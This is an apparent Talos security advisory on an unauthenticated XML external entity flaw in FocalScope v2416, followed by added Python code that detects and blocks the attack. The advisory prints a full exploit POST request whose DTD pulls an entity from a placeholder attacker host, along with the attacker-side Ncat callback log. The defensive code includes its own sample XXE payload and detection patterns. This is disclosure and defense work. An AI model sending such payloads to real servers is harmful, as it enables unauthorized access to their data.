Talos Intelligence: TALOS-2018-0559
Jul 20, 2018 - 12:00 a.m.

FocalScope XML External Entity Injection Vulnerability

2018-07-20 00:00:00
Talos Intelligence
www.talosintelligence.com

CVSS2: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3: 9.4 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: LOW
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

EPSS: 0.008 Low
Percentile: 81.3%

Summary

An exploitable, unauthenticated XML external entity (XXE) injection vulnerability was identified in FocalScope v2416. An unauthenticated attacker could submit a specially crafted web request to FocalScope's server that triggers the XXE and could result in data compromise.

Tested Versions

FocalScope v2416

Product URLs

<http://www.focalscope.com/download.html>

CVSSv3 Score

9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

CWE

CWE-611: Improper Restriction of XML External Entity Reference (‘XXE’)

Details

FocalScope v2416 and prior versions are vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:

POST /emm/_cros_/xlogin.asp HTTP/1.1
Host: [IP]
Content-Length: 315
Origin: http://[IP]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> %remote;%int;%trick;]><body><o i='msg'><s>url:xlogin.asp</s><s>GetSalt</s><o i='oParam'><s>PCSL</s><s>self</s><s>PutSalt</s></o></o></body>

On the attacking server, the following request was observed:
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.0
Accept: */*
UA-CPU: AMD64
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: x.x.x.x
Connection: Keep-Alive

Note: It was also observed that virtually any page that accepts XML input in a POST request is affected by this vulnerability, regardless of whether the page is protected by authentication.
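The request above relies on a DTD whose parameter entity is fetched from an attacker-controlled host; the application's XML parser resolves it without being asked. As an added example (not part of the Talos advisory and not FocalScope's code), the Python below shows the two controls a defender would want at an endpoint like this: a detection pass that flags request bodies carrying a DOCTYPE, an external entity declaration or a parameter entity reference, and a parse step that uses expat configured to refuse any DTD and any external entity before it can be resolved. The sample bodies are constructed to mirror the advisory's payload shape, and the host attacker.invalid is a placeholder.

```python
# Added example (not from the Talos advisory or FocalScope): detecting the XXE
# request shape described above and parsing XML so that it cannot be triggered.
import re
import xml.parsers.expat

# Constructed sample bodies modelled on the advisory's payload. The host
# attacker.invalid is a placeholder, not a real indicator.
SAMPLE_XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.invalid/xxe"> %remote;]>'
    "<body><o i='msg'><s>url:xlogin.asp</s><s>GetSalt</s></o></body>"
)
SAMPLE_BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<body><o i='msg'><s>url:xlogin.asp</s><s>GetSalt</s></o></body>"
)

# Detection: a legitimate request to an endpoint like this never needs a DTD, so
# any DOCTYPE, external entity declaration or parameter entity reference is a signal.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(r"%\w+;")


def xxe_indicators(body: str) -> list:
    """Return the XXE indicators present in a raw XML request body (empty if none)."""
    found = []
    if DOCTYPE_RE.search(body):
        found.append("doctype")
    if EXTERNAL_ENTITY_RE.search(body):
        found.append("external-entity")
    if PARAM_ENTITY_REF_RE.search(body):
        found.append("parameter-entity-ref")
    return found


class DtdRejected(ValueError):
    """Raised when the document carries a DTD, which this kind of endpoint never needs."""


def parse_without_dtd(body: str) -> list:
    """Parse XML with expat while refusing DTDs and external entities.

    Returns (element, text) pairs for elements with text content so the caller
    can see what a hardened parser still extracts from a benign request.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    # Never expand parameter entities (the %remote; reference in the advisory).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fail closed as soon as a DOCTYPE appears, before any entity is declared.
        raise DtdRejected("DTD not allowed (root %r)" % name)

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 makes expat report the reference as an error instead of fetching it.
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity

    elements = []
    text_buf = []

    def on_start(name, attrs):
        text_buf.clear()

    def on_chars(data):
        text_buf.append(data)

    def on_end(name):
        text = "".join(text_buf).strip()
        if text:
            elements.append((name, text))
        text_buf.clear()

    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(body, True)
    return elements


def handle_request_body(body: str) -> dict:
    """Gatekeeper a login-style endpoint could apply: record indicators, then parse safely."""
    indicators = xxe_indicators(body)
    try:
        elements = parse_without_dtd(body)
    except DtdRejected as exc:
        return {"accepted": False, "reason": str(exc), "indicators": indicators}
    except xml.parsers.expat.ExpatError as exc:
        return {"accepted": False, "reason": "malformed: %s" % exc, "indicators": indicators}
    return {"accepted": True, "elements": elements, "indicators": indicators}


if __name__ == "__main__":
    for label, body in (("xxe", SAMPLE_XXE_BODY), ("benign", SAMPLE_BENIGN_BODY)):
        print(label, handle_request_body(body))
```

The detection regexes are a logging and alerting aid, not the control: the parse step is what prevents resolution, because it rejects the document at the DOCTYPE declaration and would also refuse an external entity reference if one reached the parser. A server-side equivalent for the MSXML parser used by classic ASP is to disable DTD processing and external resolution on the parser object; the exact property names depend on the MSXML version and are not shown here.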

Timeline

2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release

